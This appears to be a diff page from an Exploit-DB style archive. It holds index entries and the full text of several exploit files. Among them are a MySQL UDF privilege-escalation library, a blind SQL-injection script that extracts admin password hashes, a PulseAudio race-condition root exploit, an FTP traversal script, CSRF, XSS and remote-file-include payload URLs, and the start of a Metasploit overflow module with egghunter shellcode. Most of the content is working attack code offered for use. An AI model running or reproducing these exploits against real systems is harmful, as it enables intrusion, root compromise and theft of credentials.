33863,platforms/hardware/remote/33863.rb,"D-Link hedwig.cgi Buffer Overflow in Cookie Header",2014-06-24,metasploit,hardware,remote,80
33865,platforms/linux/remote/33865.rb,"AlienVault OSSIM av-centerd Command Injection",2014-06-24,metasploit,linux,remote,40007
33866,platforms/hardware/webapps/33866.html,"Thomson TWG87OUIR - POST Password CSRF",2014-06-25,nopesled,hardware,webapps,0
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
33867,platforms/php/webapps/33867.txt,"Lunar CMS 3.3 - Unauthenticated Remote Command Execution Exploit",2014-06-25,LiquidWorm,php,webapps,0
33868,platforms/multiple/remote/33868.txt,"Apache ActiveMQ 5.2/5.3 Source Code Information Disclosure Vulnerability",2010-04-22,"Veerendra G.G",multiple,remote,0
33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure Vulnerability",2010-04-22,hkm,hardware,remote,0
33870,platforms/php/webapps/33870.txt,"FlashCard 2.6.5 'id' Parameter Cross Site Scripting Vulnerability",2010-04-22,Valentin,php,webapps,0
@ -30660,3 +30660,15 @@ id,file,description,date,author,platform,type,port
34044,platforms/php/webapps/34044.txt,"md5 Encryption Decryption PHP Script 'index.php' Cross Site Scripting Vulnerability",2010-05-26,indoushka,php,webapps,0
34045,platforms/php/webapps/34045.txt,"BackLinkSpider 1.3.1774 'cat_id' Parameter SQL Injection Vulnerability",2010-05-27,"sniper ip",php,webapps,0
34046,platforms/php/webapps/34046.txt,"BackLinkSpider 1.3.1774 Multiple Cross Site Scripting Vulnerabilities",2010-05-27,"sniper ip",php,webapps,0
34047,platforms/windows/remote/34047.html,"Home FTP Server 1.10.3 (build 144) Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",windows,remote,0
34048,platforms/multiple/remote/34048.html,"Brekeke PBX 2.4.4.8 'pbx/gate' Cross Site Request Forgery Vulnerability",2010-05-26,"John Leitch",multiple,remote,0
34049,platforms/php/webapps/34049.txt,"Layout CMS 1.0 SQL-Injection and Cross-Site Scripting Vulnerabilities",2010-01-12,Red-D3v1L,php,webapps,0
34050,platforms/windows/remote/34050.py,"Home FTP Server 1.10.2.143 Directory Traversal Vulnerability",2010-05-27,"John Leitch",windows,remote,0
34051,platforms/windows/dos/34051.py,"Core FTP Server 1.0.343 Directory Traversal Vulnerability",2010-05-28,"John Leitch",windows,dos,0
34052,platforms/php/webapps/34052.py,"osCommerce Visitor Web Stats Add-On 'Accept-Language' Header SQL Injection Vulnerability",2010-05-28,"Christopher Schramm",php,webapps,0
34053,platforms/php/webapps/34053.txt,"ImpressPages CMS 1.0x 'admin.php' Multiple SQL Injection Vulnerabilities",2010-05-28,"High-Tech Bridge SA",php,webapps,0
34054,platforms/php/webapps/34054.txt,"GR Board 1.8.6 'page.php' Remote File Include Vulnerability",2010-05-30,eidelweiss,php,webapps,0
34055,platforms/php/webapps/34055.txt,"CMScout <= 2.08 Cross Site Scripting Vulnerability",2010-05-28,XroGuE,php,webapps,0
34056,platforms/php/webapps/34056.txt,"Joomla! 1.5.x Multiple Modules 'search' Parameter Cross-Site Scripting Vulnerabilities",2010-05-28,"Riyaz Ahemed Walikar",php,webapps,0
34057,platforms/php/webapps/34057.txt,"wsCMS 'news.php' Cross Site Scripting Vulnerability",2010-05-31,cyberlog,php,webapps,0
34058,platforms/multiple/dos/34058.txt,"DM Database Server 'SP_DEL_BAK_EXPIRED' Memory Corruption Vulnerability",2010-05-31,"Shennan Wang HuaweiSymantec SRT",multiple,dos,0

Can't render this file because it is too large.

180
platforms/linux/local/1518.c
View file

@ -1,90 +1,90 @@
/*
* $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
*
* raptor_udf2.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!), slightly modified to work
* with newer versions of the open-source database. Tested on MySQL 4.1.14.
*
* See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
*
* Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
* for the security vulnerabilities in the handling of User Defined Functions
* (UDFs) reported by Stefano Di Paola <stefano.dipaola@wisec.it>. For further
* details, please refer to:
*
* http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
* http://www.wisec.it/vulns.php?page=4
* http://www.wisec.it/vulns.php?page=5
* http://www.wisec.it/vulns.php?page=6
*
* "UDFs should have at least one symbol defined in addition to the xxx symbol
* that corresponds to the main xxx() function. These auxiliary symbols
* correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
* xxx_add() functions". -- User Defined Functions Security Precautions
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/
#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;
typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);
system(args->args[0]);
return(0);
}
char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
return(0);
}
// milw0rm.com [2006-02-20]
/*
* $Id: raptor_udf2.c,v 1.1 2006/01/18 17:58:54 raptor Exp $
*
* raptor_udf2.c - dynamic library for do_system() MySQL UDF
* Copyright (c) 2006 Marco Ivaldi <raptor@0xdeadbeef.info>
*
* This is an helper dynamic library for local privilege escalation through
* MySQL run with root privileges (very bad idea!), slightly modified to work
* with newer versions of the open-source database. Tested on MySQL 4.1.14.
*
* See also: http://www.0xdeadbeef.info/exploits/raptor_udf.c
*
* Starting from MySQL 4.1.10a and MySQL 4.0.24, newer releases include fixes
* for the security vulnerabilities in the handling of User Defined Functions
* (UDFs) reported by Stefano Di Paola <stefano.dipaola@wisec.it>. For further
* details, please refer to:
*
* http://dev.mysql.com/doc/refman/5.0/en/udf-security.html
* http://www.wisec.it/vulns.php?page=4
* http://www.wisec.it/vulns.php?page=5
* http://www.wisec.it/vulns.php?page=6
*
* "UDFs should have at least one symbol defined in addition to the xxx symbol
* that corresponds to the main xxx() function. These auxiliary symbols
* correspond to the xxx_init(), xxx_deinit(), xxx_reset(), xxx_clear(), and
* xxx_add() functions". -- User Defined Functions Security Precautions
*
* Usage:
* $ id
* uid=500(raptor) gid=500(raptor) groups=500(raptor)
* $ gcc -g -c raptor_udf2.c
* $ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
* $ mysql -u root -p
* Enter password:
* [...]
* mysql> use mysql;
* mysql> create table foo(line blob);
* mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));
* mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
* mysql> create function do_system returns integer soname 'raptor_udf2.so';
* mysql> select * from mysql.func;
* +-----------+-----+----------------+----------+
* | name | ret | dl | type |
* +-----------+-----+----------------+----------+
* | do_system | 2 | raptor_udf2.so | function |
* +-----------+-----+----------------+----------+
* mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');
* mysql> \! sh
* sh-2.05b$ cat /tmp/out
* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
* [...]
*/
#include <stdio.h>
#include <stdlib.h>
enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};
typedef struct st_udf_args {
unsigned int arg_count; // number of arguments
enum Item_result *arg_type; // pointer to item_result
char **args; // pointer to arguments
unsigned long *lengths; // length of string args
char *maybe_null; // 1 for maybe_null args
} UDF_ARGS;
typedef struct st_udf_init {
char maybe_null; // 1 if func can return NULL
unsigned int decimals; // for real functions
unsigned long max_length; // for string functions
char *ptr; // free ptr for func data
char const_item; // 0 if result is constant
} UDF_INIT;
int do_system(UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)
{
if (args->arg_count != 1)
return(0);
system(args->args[0]);
return(0);
}
char do_system_init(UDF_INIT *initid, UDF_ARGS *args, char *message)
{
return(0);
}
// milw0rm.com [2006-02-20]

6
platforms/linux/remote/10.c
View file

@ -1279,6 +1279,6 @@ r1.sin_addr), 45295, 2) != -1) {
}
return 0;
}
// milw0rm.com [2003-04-10]
}
// milw0rm.com [2003-04-10]

9
platforms/multiple/dos/34058.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40460/info
DM Database Server is a database application.
DM Database Server is prone to a remote memory-corruption vulnerability. This issue affects the 'CALL SP_DEL_BAK_EXPIRED' function when a large string is passed to the first argument.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
CALL SP_DEL_BAK_EXPIRED('AAAAAAAAAAAAAAAAAAAA', '');

9
platforms/multiple/remote/34048.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40407/info
Brekeke PBX is prone to a cross-site request-forgery vulnerability.
Exploiting this issue may allow a remote attacker to perform certain administrative actions and gain unauthorized access to the affected application. Other attacks are also possible.
Brekeke PBX 2.4.4.8 is vulnerable; other versions may be affected.
<html> <body> <img src="http://www.example.com:28080/pbx/gate?bean=pbxadmin.web.PbxUserEdit&user=sa&disabled=false&name=&language=en&password=new_password&password2=new_password&phoneforward=&ringertime=60&noanswerforward=vmsa&noanswerforward.voicemail=on&busyforward=vmsa&busyforward.voicemail=on&dtmfcommand=true&defaultpickup=&index=1&greetingtype=3&recordlength=&messageforward=&email=&emailnotification=true&emailattachment=true&admin=true&userplugin=user&personalivr=&rtprelay=default&payload=&useremotepayload=default&recording=false&canjoin=true&allowjoin=true&aotomonitor=&maxsessioncount=-1&resourcemap=&operation=store" /> </body> </html>

10
platforms/php/webapps/34049.txt Executable file
View file

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/40415/info
Layout CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Layout CMS 1.0 is vulnerable; other versions may be affected.
http://www.example.com/preview.php?id=-1+union+select+1,2,concat%28pass,0x3e,uname%29,4,5,6,7,8,9,10+from+layout_demo.users
http://www.example.com/preview.php?id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E

95
platforms/php/webapps/34052.py Executable file
View file

@ -0,0 +1,95 @@
source: http://www.securityfocus.com/bid/40425/info
osCommerce Visitor Web Stats is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
import sys
import http.client
if len(sys.argv) < 2:
print("usage: " + sys.argv[0] + " <host> [<path>]")
sys.exit();
host = sys.argv[1]
if len(sys.argv) > 2:
path = sys.argv[2]
else:
path = "/"
def req(lang):
c = http.client.HTTPConnection(host)
c.request('GET', path, '', {'Accept-Language': lang})
return c.getresponse().read();
def check(condition):
r = req("' AND 1=0 UNION SELECT id FROM administrators " + condition
+ " -- '")
if r.find(b'update') != -1:
return 1;
elif r.find(b'Unknown column') != -1:
print('Unknown database structure (no rc version?)')
sys.exit();
return 0;
if req("'").find(b'select counter FROM visitors where browser_ip') == -1:
print('Target does not seem to have (a vulnarable version of)
Visitor Web Stats or doesn\'t output any error messages')
sys.exit();
admin_count = 1
while not check("HAVING COUNT(*) = " + str(admin_count)):
admin_count += 1;
print("Number of admins: " + str(admin_count))
pw_chars = [x for x in range(48, 58)]
pw_chars.extend([x for x in range(97, 103)])
pw_chars.sort()
todo = [('', 0, 255)]
while len(todo):
(found, start, end) = todo.pop()
if start == 0 and end == 255 and check("WHERE user_name = '" + found
+ "'"):
sys.stdout.write(found + " ")
sys.stdout.flush()
for i in range(35):
if i == 32:
sys.stdout.write(":")
sys.stdout.flush()
continue
pw_start, pw_end = 0, len(pw_chars) - 1
while pw_start != pw_end:
pw_mid = int((pw_start + pw_end) / 2)
if check("WHERE user_name = '" + found + "'
AND ORD(SUBSTRING(user_password, " + str(i + 1) + ", 1)) <= " +
str(pw_chars[pw_mid])):
pw_end = pw_mid
else:
if pw_mid == pw_end - 1:
pw_start = pw_end
else:
pw_start = pw_mid
sys.stdout.write(chr(pw_chars[pw_start]))
sys.stdout.flush()
print()
if not check("WHERE SUBSTRING(user_name, 1, " +
str(len(found)) + ") = '" + found + "' AND SUBSTRING(user_name, " +
str(len(found) + 1) + ", 1) > 0"):
continue;
mid = int((start + end) / 2)
if check("WHERE SUBSTRING(user_name, 1, " + str(len(found)) + ") =
'" + found + "' AND ORD(SUBSTRING(user_name, " + str(len(found) + 1) + ",
1)) <= " + str(mid) + " AND ORD(SUBSTRING(user_name, " + str(len(found) + 1)
+ ", 1)) > 0"):
if mid == start + 1:
todo.append((found + chr(mid), 0, 255))
else:
todo.append((found, start, mid))
if check("WHERE SUBSTRING(user_name, 1, " + str(len(found)) + ") =
'" + found + "' AND ORD(SUBSTRING(user_name, " + str(len(found) + 1) + ",
1)) > " + str(mid)):
if mid == end - 1:
todo.append((found + chr(end), 0, 255))
else:
todo.append((found, mid, end))

13
platforms/php/webapps/34053.txt Executable file
View file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/40431/info
ImpressPages CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
ImpressPages CMS 1.0.4 is vulnerable; prior versions may also be affected.
The following example URIs are available:
http://www.example.com/admin.php?module_id=329&security_token=$valid_token&page[0]=&page_size[0]=200+ANY_SQL_HERE+--++
http://www.example.com/admin.php?module_id=329&security_token=$valid_token&sort_field[1]=&email+ANY_SQL_HERE+--+&sort_dir[1]=asc

9
platforms/php/webapps/34054.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40437/info
GR Board is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
This issue affects version 1.8.6.1; other versions may also be vulnerable.
http://www.example.com/path/page.php?theme=http://attacker's site

8
platforms/php/webapps/34055.txt Executable file
View file

@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/40442/info
CMScout is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The following example input to the 'search' field is available:
<marquee><font color=Blue size=15>XroGuE</font></marquee>

29
platforms/php/webapps/34056.txt Executable file
View file

@ -0,0 +1,29 @@
source: http://www.securityfocus.com/bid/40444/info
Joomla! is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
The issue affects Joomla! versions prior to 1.5.18.
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.example.com%27%29%22%3E
http://www.example.com/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://www.example.com/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

7
platforms/php/webapps/34057.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40447/info
wsCMS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/news.php?id=<script><font color=red size=15>XSS</font></script>

74
platforms/windows/dos/34051.py Executable file
View file

@ -0,0 +1,74 @@
source: http://www.securityfocus.com/bid/40422/info
Core FTP Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Core FTP Server 1.0.343 is vulnerable; other versions may also be affected.
import sys, socket, re
host = 'localhost'
port = 21
user = 'anonymous'
password = 'a'
buffer_size = 8192
timeout = 8
def recv(s):
resp = ''
while 1:
r = s.recv(buffer_size)
if not r: break
resp += r
return resp
def list_root():
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(timeout)
print s.recv(buffer_size)
s.send('USER ' + user + '\r\n')
print s.recv(buffer_size)
s.send('PASS ' + password + '\r\n')
print s.recv(buffer_size) + s.recv(buffer_size)
s.send('CWD ' + '/...' * 16 + '\r\n')
resp = s.recv(buffer_size)
print resp
if resp[:3] == '250':
s.send('PASV\r\n')
resp = s.recv(buffer_size)
print resp
pasv_info = re.search(u'(\d+),(\d+),(\d+),(\d+),(\d+),(\d+)', resp)
if (pasv_info == None):
print 'Invalid PASV response: ' + resp
return
s.send('LIST\r\n')
s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s2.connect((host, int(pasv_info.group(5)) * 256 + int(pasv_info.group(6))))
s2.settimeout(timeout)
print recv(s2)
s.close()
except Exception:
print sys.exc_info()
list_root()

366
platforms/windows/local/9207.sh
View file

@ -1,183 +1,183 @@
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
function cleanup()
{
rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
rm -rf $workdir/PATMP*
}
cat > $workdir/pa_race.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/wait.h>
#define PULSEAUDIO_PATH "$pulseaudio"
#define SH_PATH "$workdir/sh"
#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"
void _pause(long sec, long usec);
int main(int argc, char *argv[], char *envp[])
{
int status;
pid_t pid;
char template[sizeof(TMPDIR_TEMPLATE)];
char *tmpdir;
char hardlink[sizeof(template) + 2];
char hardlink2[sizeof(template) + 12];
srand(time(NULL));
for( ; ; )
{
snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
template[sizeof(template) - 1] = '\0';
tmpdir = mkdtemp(template);
if(tmpdir == NULL)
{
perror("mkdtemp");
return 1;
}
snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
hardlink[sizeof(hardlink) - 1] = '\0';
snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
hardlink2[sizeof(hardlink2) - 1] = '\0';
/* this fails if $workdir is a different partition */
if(link(PULSEAUDIO_PATH, hardlink) == -1)
{
perror("link");
return 1;
}
if(link(SH_PATH, hardlink2) == -1)
{
perror("link");
return 1;
}
pid = fork();
if(pid == 0)
{
char *argv[] = {hardlink, NULL};
char *envp[] = {NULL};
execve(hardlink, argv, envp);
perror("execve");
return 1;
}
if(pid == -1)
{
perror("fork");
return 1;
}
else
{
/* tweak this if exploit does not work */
_pause(0, rand() % 500);
if(unlink(hardlink) == -1)
{
perror("unlink");
return 1;
}
if(link(SH_PATH, hardlink) == -1)
{
perror("link");
return 1;
}
waitpid(pid, &status, 0);
}
if(unlink(hardlink) == -1)
{
perror("unlink");
return 1;
}
if(unlink(hardlink2) == -1)
{
perror("unlink");
return 1;
}
if(rmdir(tmpdir) == -1)
{
perror("rmdir");
return 1;
}
}
return 0;
}
void _pause(long sec, long usec)
{
struct timeval timeout;
timeout.tv_sec = sec;
timeout.tv_usec = usec;
if(select(0, NULL, NULL, NULL, &timeout) == -1)
{
perror("select");
}
}
__EOF__
cat > $workdir/sh.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
int main(int argc, char *argv[], char *envp[])
{
if(geteuid() != 0)
{
return 1;
}
setuid(0);
setgid(0);
if(fork() == 0)
{
argv[0] = "$id";
argv[1] = NULL;
execve(argv[0], argv, envp);
return 1;
}
argv[0] = "$shell";
argv[1] = NULL;
execve(argv[0], argv, envp);
return 1;
}
__EOF__
gcc -o $workdir/pa_race $workdir/pa_race.c
gcc -o $workdir/sh $workdir/sh.c
$workdir/pa_race
# milw0rm.com [2009-07-20]
#!/bin/bash
pulseaudio=`which pulseaudio`
workdir="/tmp"
#workdir=$HOME
id=`which id`
shell=`which sh`
trap cleanup INT
function cleanup()
{
rm -f $workdir/sh $workdir/sh.c $workdir/pa_race $workdir/pa_race.c
rm -rf $workdir/PATMP*
}
cat > $workdir/pa_race.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <sys/types.h>
#include <sys/wait.h>
#define PULSEAUDIO_PATH "$pulseaudio"
#define SH_PATH "$workdir/sh"
#define TMPDIR_TEMPLATE "$workdir/PATMPXXXXXX"
void _pause(long sec, long usec);
int main(int argc, char *argv[], char *envp[])
{
int status;
pid_t pid;
char template[sizeof(TMPDIR_TEMPLATE)];
char *tmpdir;
char hardlink[sizeof(template) + 2];
char hardlink2[sizeof(template) + 12];
srand(time(NULL));
for( ; ; )
{
snprintf(template, sizeof(template), "%s", TMPDIR_TEMPLATE);
template[sizeof(template) - 1] = '\0';
tmpdir = mkdtemp(template);
if(tmpdir == NULL)
{
perror("mkdtemp");
return 1;
}
snprintf(hardlink, sizeof(hardlink), "%s/A", tmpdir);
hardlink[sizeof(hardlink) - 1] = '\0';
snprintf(hardlink2, sizeof(hardlink2), "%s/A (deleted)", tmpdir);
hardlink2[sizeof(hardlink2) - 1] = '\0';
/* this fails if $workdir is a different partition */
if(link(PULSEAUDIO_PATH, hardlink) == -1)
{
perror("link");
return 1;
}
if(link(SH_PATH, hardlink2) == -1)
{
perror("link");
return 1;
}
pid = fork();
if(pid == 0)
{
char *argv[] = {hardlink, NULL};
char *envp[] = {NULL};
execve(hardlink, argv, envp);
perror("execve");
return 1;
}
if(pid == -1)
{
perror("fork");
return 1;
}
else
{
/* tweak this if exploit does not work */
_pause(0, rand() % 500);
if(unlink(hardlink) == -1)
{
perror("unlink");
return 1;
}
if(link(SH_PATH, hardlink) == -1)
{
perror("link");
return 1;
}
waitpid(pid, &status, 0);
}
if(unlink(hardlink) == -1)
{
perror("unlink");
return 1;
}
if(unlink(hardlink2) == -1)
{
perror("unlink");
return 1;
}
if(rmdir(tmpdir) == -1)
{
perror("rmdir");
return 1;
}
}
return 0;
}
void _pause(long sec, long usec)
{
struct timeval timeout;
timeout.tv_sec = sec;
timeout.tv_usec = usec;
if(select(0, NULL, NULL, NULL, &timeout) == -1)
{
perror("select");
}
}
__EOF__
cat > $workdir/sh.c << __EOF__
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
int main(int argc, char *argv[], char *envp[])
{
if(geteuid() != 0)
{
return 1;
}
setuid(0);
setgid(0);
if(fork() == 0)
{
argv[0] = "$id";
argv[1] = NULL;
execve(argv[0], argv, envp);
return 1;
}
argv[0] = "$shell";
argv[1] = NULL;
execve(argv[0], argv, envp);
return 1;
}
__EOF__
gcc -o $workdir/pa_race $workdir/pa_race.c
gcc -o $workdir/sh $workdir/sh.c
$workdir/pa_race
# milw0rm.com [2009-07-20]

362
platforms/windows/remote/2467.pm
View file

@ -1,181 +1,181 @@
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mcafee_epolicy_source;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'McAfee ePolicy Orchestrator / ProtPilot Source Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' =>
[
'muts <muts [at] remote-exploit.org>',
'xbxice[at]yahoo.com',
'H D Moore <hdm [at] metasploit.com>'
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 81],
'SSL' => [0, 'BOOL', 'Use SSL'],
},
'Payload' =>
{
# Space is almost unlimited, but 1024 is fine for now
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0b\x0d\x20\x26\x2b\x3d\x25\x8c\x3c\xff",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This is a stack overflow exploit for McAfee ePolicy Orchestrator 3.5.0
and ProtectionPilot 1.1.0. Tested on Windows 2000 SP4 and Windows 2003 SP1.
This module is based on the exploit by xbxice and muts.
}),
'Refs' =>
[
['URL', 'http://www.remote-exploit.org/advisories/mcafee-epo.pdf' ],
],
'DefaultTarget' => 0,
'Targets' =>
[
['Windows 2000/2003 ePo 3.5.0/ProtectionPilot 1.1.0', 96, 0x601EDBDA], # pop pop ret xmlutil.dll
],
'Keys' => ['epo'],
'DisclosureDate' => 'Jul 17 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
# Use a egghunter stub to find the payload
my $eggtag = Pex::Text::AlphaNumText(4);
my $egghunt =
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
"\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
$eggtag .
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
# Create the 64-byte GUID
my $guid = Pex::Text::AlphaNumText(64);
# Create the 260 byte Source header
my $evil = Pex::Text::AlphaNumText(260);
#
# A long Source header results in a handful of exceptions.
# The first exception occurs with a pointer at offset 116.
# This exception occurs because a function pointer is
